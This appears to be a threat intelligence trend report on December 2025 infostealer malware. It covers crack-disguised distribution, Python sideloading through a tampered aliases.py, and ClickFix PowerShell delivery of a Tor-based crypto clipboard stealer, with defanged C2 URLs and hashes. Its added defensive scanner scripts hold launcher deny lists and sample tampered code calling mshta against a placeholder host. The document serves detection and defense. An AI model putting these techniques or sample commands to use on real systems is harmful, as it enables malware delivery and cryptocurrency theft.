December 2025 Infostealer Trend Report
This report provides statistics, trends, and case information on Infostealer malware collected and analyzed during the month of December 2025, including distribution volume, distribution channels, and disguising techniques. The following is a summary of the report.
1) Data Source and Collection Method
The AhnLab SEcurity intelligence Center (ASEC) operates various systems to automatically collect and distribute malware for proactive threat response. The collected malware is analyzed by an automated system to determine its maliciousness and C2 information. The relevant information is provided in real-time through the ATIP IOC service, and additional information can be found on the ATIP File Analysis Information page.
AhnLab’s self-developed system
- Crack and patch concealment malware automatic collection system
- Email honeypot system
- Malware C2 automatic analysis system
ATIP Real-time IOC service
C2 and Malware Type Analysis Information
- File Analysis Information – Related Information – Contacted URLs
The statistics in this report are intended to give an overall picture of the distribution volume, disguise techniques, and distribution trends of Infostealer malware.
2) Infostealer Distributed with Crack Disguise
These statistics cover Infostealer malware distributed disguised as illegal programs such as cracks and keygens. The malware is distributed by pushing the distribution posts to the top of search engine results (SEO poisoning). ASEC operates a system that automatically collects malware distributed in this way and analyzes its C2 information so that the C2 can be blocked in real time and the relevant information provided through ATIP. In December, the most widely distributed Infostealers were ACRStealer, LummaC2, and Stealc.

Figure 1. Page distributing malware
The following chart shows the amount of malware distributed using this method over the course of 2025. The second legend shows the number of samples AhnLab collected before the corresponding information was available on VirusTotal, which shows that AhnLab's automatic collection system was the first to collect and respond to the majority of this malware.

Chart 1. Quantity of Malware Distributed Annually
Previously, threat actors directly posted articles on blogs they created to distribute malware, but search engines began taking measures to prevent such malicious blogs from appearing in search results. To circumvent this, threat actors are now posting articles on legitimate websites to distribute malware. They are utilizing famous forums, Q&A pages of specific companies, free boards, comments, etc. The following image shows an example of posts for distributing malware uploaded to various communities. Posts uploaded in this manner appear at the top of search engine results and are visited by many users. Recently, there has been a growing trend of threat actors attacking poorly managed WordPress websites to post distribution articles.

Figure 2. Posts on the local newspaper website in Korea
As shown above, the distributed Infostealers use one of two execution methods: either the malware itself is an EXE, or it uses DLL sideloading, in which a legitimate EXE and a malicious DLL are placed in the same folder so that running the legitimate EXE loads the malicious DLL. In December 2025, 65.8% of the malware was distributed in EXE format and 34.2% used DLL sideloading. Compared with the previous month (November 2025), the share of DLL sideloading decreased significantly, most likely because the downloaders that had been heavily distributed via DLL sideloading declined. DLL sideloading samples are created by patching part of a legitimate DLL with malicious code, so they closely resemble the original file; as a result, other security products have often classified them as legitimate, which underscores the need for vigilance.
Trend #1
– Malware Distribution via Abusing Python (Python Sideloading)
A recent case revealed malware distributed by abusing Python. The attacker tampered with a specific script (.py) inside the legitimate Python library folder (Lib) and injected malicious code into it, then packaged the modified script together with a legitimate Python executable into a compressed archive for distribution. Because the interpreter imports certain modules from Lib automatically when it starts (the encodings package, to which the modified script belongs, is one of them), the attacker-modified script runs as part of normal initialization, allowing the embedded malicious code to execute without raising suspicion.
– Path
.\Lib\encodings\aliases.py
– md5
5cabcab4233affa40bb8ddd846270779 (Downloader/Python.Stealer)
– c2
hxxps://globalsnn3-new[.]cc/newSide.forester
The code inserted by the threat actor runs mshta against the C2 URL, and it was later confirmed that this led to the execution of ACRStealer.

Figure 3. Python script with malicious command
Previously, threat actors mainly modified Python DLL files to deliver payloads via DLL sideloading. In this case they took a different approach: instead of tampering with executables, they abused a Python script (.py) itself to deliver the malicious payload.
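One way to check a redistributed Python installation for this kind of tampering is to inspect the modules the interpreter imports during startup, the encodings package that contains aliases.py, for code that spawns a process or for string literals naming living-off-the-land launchers such as mshta. The script below is an added example and is not code from the ASEC report; the sample sources it scans are constructed, the import-alias resolution is an assumption about how an attacker might try to hide the call, and the URL in the tampered samples is a placeholder, not the C2 from the report.

```python
"""Scan the stdlib modules that Python imports during interpreter startup
(the encodings package, which contains aliases.py) for injected code that
spawns a process.  Added example; not code from the ASEC report."""
import ast
import encodings
from pathlib import Path

# Call targets that have no business in a codec/alias module.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "os.startfile", "os.spawnl", "os.spawnv",
    "os.execl", "os.execv", "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_call", "subprocess.check_output",
    "exec", "eval",
}
SUSPICIOUS_PREFIXES = ("ctypes.windll.", "ctypes.cdll.", "ctypes.WinDLL", "ctypes.CDLL")
# Living-off-the-land launchers that should never appear in a string literal there.
SUSPICIOUS_STRINGS = ("mshta", "powershell", "cmd.exe", "rundll32", "certutil")


def _alias_map(tree: ast.AST) -> dict:
    """Map local names to what they import ('import subprocess as sp', 'from os import system as run')."""
    m = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                top = a.name.split(".")[0]
                m[a.asname or top] = a.name if a.asname else top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                m[a.asname or a.name] = f"{node.module}.{a.name}"
    return m


def _call_name(node: ast.Call, aliases: dict) -> str:
    """Dotted call target with import aliases resolved, e.g. 'subprocess.Popen'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if not isinstance(f, ast.Name):
        return ""  # getattr(...)() and similar indirection are not resolved here
    parts.append(f.id)
    parts.reverse()
    parts[0] = aliases.get(parts[0], parts[0])
    return ".".join(parts)


def scan_source(source: str, filename: str = "<string>") -> list[str]:
    """Return one finding per suspicious call or string literal in a module."""
    try:
        tree = ast.parse(source, filename)
    except SyntaxError as e:
        return [f"{filename}: does not parse ({e.msg})"]
    aliases = _alias_map(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node, aliases)
            if name in SUSPICIOUS_CALLS or name.startswith(SUSPICIOUS_PREFIXES):
                findings.append(f"{filename}:{node.lineno}: call to {name}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            hit = next((s for s in SUSPICIOUS_STRINGS if s in node.value.lower()), None)
            if hit:
                findings.append(f"{filename}:{node.lineno}: string literal mentions {hit!r}")
    return findings


def scan_encodings_package(lib_dir=None) -> list[str]:
    """Scan encodings/*.py under a Lib directory (default: the running interpreter's)."""
    enc_dir = Path(lib_dir) / "encodings" if lib_dir else Path(encodings.__file__).parent
    findings = []
    for p in sorted(enc_dir.glob("*.py")):
        findings += scan_source(p.read_text(encoding="utf-8", errors="replace"), str(p))
    return findings


# Constructed samples: a benign excerpt modelled on aliases.py and two tampered
# variants.  The URL is a placeholder, not the C2 from the report.
BENIGN_ALIASES = '''\
""" Encoding Aliases Support (constructed excerpt). """
aliases = {
    # ascii codec
    '646': 'ascii',
    'ansi_x3.4_1968': 'ascii',
    'us_ascii': 'ascii',
}
'''
TAMPERED_ALIASES = BENIGN_ALIASES + '''\
import subprocess as sp
sp.Popen(["mshta", "https://example.invalid/stage.hta"], shell=False)
'''
TAMPERED_FROM_IMPORT = BENIGN_ALIASES + '''\
from os import system as _s
_s("mshta https://example.invalid/stage.hta")
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_ALIASES), ("tampered", TAMPERED_ALIASES)):
        print(label, scan_source(src, "aliases.py") or ["no findings"])
    print(scan_encodings_package() or ["running interpreter: no findings"])
```

Point scan_encodings_package at the Lib folder of a suspect archive rather than at the interpreter you trust. The AST scan is a triage aid, not proof of integrity: code reached through getattr, string decoding or a bytecode-only .pyc is not resolved here, so pair it with a hash comparison of every file under Lib against a pristine copy of the same Python version, and use python -X importtime -c pass to list exactly which modules a given interpreter imports before any user code runs.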
Trend #2
– Distribution of Cryptocurrency‑Stealing Malware Leveraging Tor
Malware designed to persist on a victim’s system and steal cryptocurrency is being actively distributed. In the campaigns observed in December, attackers employed the ClickFix technique and compromised WordPress websites to mass‑publish malicious posts. When a user enters a CAPTCHA code on one of these posts, a malicious PowerShell command and a copy button become visible, prompting the user to execute the command manually through PowerShell.

Figure 4. Post distributing malware
When the user runs the command, it downloads the malware from the attacker's C2 server and executes it. The malware then creates several components in the public user directory: a malicious JavaScript file, a Tor client executable, a Task Scheduler job file used for the malicious behavior, and a text file containing BIP39 keywords.

Figure 5. Folder for creating malware
The JavaScript malware is registered in the Windows Task Scheduler so that it runs periodically. It launches the Tor client executable, named "ugate.exe", and communicates with the C2 server over the Tor network through that process. To evade detection, the malware stops its activity and exits when Task Manager is opened.
One of its primary behaviors is monitoring the clipboard. When it detects a cryptocurrency wallet address, it replaces it with the attacker’s wallet address. Additionally, if BIP39 mnemonic phrases are detected, the malware exfiltrates them to the C2 server. Since BIP39 strings serve as key recovery phrases for cryptocurrency wallets, their exposure enables attackers to gain full access to—and potentially drain—the victim’s wallet.

Figure 6. Data transmitted to the C2
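The persistence described above (a JavaScript file in the public user directory registered as a scheduled task that runs periodically) can be hunted for by exporting each task with schtasks /Query /TN name /XML and inspecting the Exec action. The script below is an added example, not code from the ASEC report or from the malware; the two task exports it parses are constructed, and the task names and file paths in them are invented for the example rather than taken from the campaign.

```python
"""Flag Windows scheduled tasks whose action launches a script host on a file
under the public user directory.  Added example; not code from the ASEC report."""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Namespace used by every task exported with `schtasks /Query /TN <name> /XML`.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
SCRIPT_FILE = re.compile(r"\.(js|jse|vbs|vbe|hta|ps1|bat)\b", re.IGNORECASE)
PUBLIC_DIR = re.compile(r"\\users\\public\\|%public%", re.IGNORECASE)


def analyze_task(root: ET.Element, task_name: str) -> list[str]:
    """Return the reasons a task looks like script-based persistence ([] if none)."""
    reasons = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS) or ""
        exe = PureWindowsPath(cmd).name.lower()
        if exe in SCRIPT_HOSTS:
            reasons.append(f"{task_name}: action runs script host {exe}")
        if SCRIPT_FILE.search(args):
            reasons.append(f"{task_name}: arguments reference a script file: {args.strip()}")
        if PUBLIC_DIR.search(cmd) or PUBLIC_DIR.search(args):
            reasons.append(f"{task_name}: command or arguments point into the public user directory")
    # A repeat interval only matters once the action itself looks wrong;
    # plenty of legitimate tasks repeat.
    interval = root.findtext(".//t:Repetition/t:Interval", namespaces=NS)
    if reasons and interval:
        reasons.append(f"{task_name}: repeats every {interval}")
    return reasons


def analyze_task_xml(xml_text: str, task_name: str) -> list[str]:
    return analyze_task(ET.fromstring(xml_text), task_name)


def analyze_task_file(path: str) -> list[str]:
    """schtasks writes UTF-16 with a BOM; parsing the raw file lets expat handle that."""
    return analyze_task(ET.parse(path).getroot(), PureWindowsPath(path).stem)


# Constructed sample exports; names and paths are invented for this example.
BENIGN_TASK = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-12-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\ExampleVendor\Updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>
'''
SUSPICIOUS_TASK = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-12-01T00:00:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>//B //nologo "C:\Users\Public\Libraries\sync.js"</Arguments>
    </Exec>
  </Actions>
</Task>
'''

if __name__ == "__main__":
    for name, xml_text in (("ExampleUpdater", BENIGN_TASK), ("PublicSync", SUSPICIOUS_TASK)):
        print(name, analyze_task_xml(xml_text, name) or ["clean"])
```

On a live host, export every task (schtasks /Query /XML ONE lists them all in one document) and run analyze_task over each Task element; a hit on a script host plus a file under Public is the combination worth pulling, and the referenced .js and any Tor client executable beside it in the same directory should then be collected before the task is removed, since the task is what re-launches the clipboard monitor.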
– MD5
997748c5b3e24c6f42e63445bb252501 (EXE – Trojan/Win.PyAgent.R751791)
720bb8ccaa694dff1231f0876343fe0e (JS – Trojan/JS.Toragent.S3133)
– C2
hxxps://activatesoftinc[.]icu/zinfoz.dat (Powershell)
hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php (JS)
For more information on statistics not covered in this summary, statistics on the disguised target companies and original file names, distribution, and products, as well as information on Infostealers through phishing emails, please refer to the full ATIP report.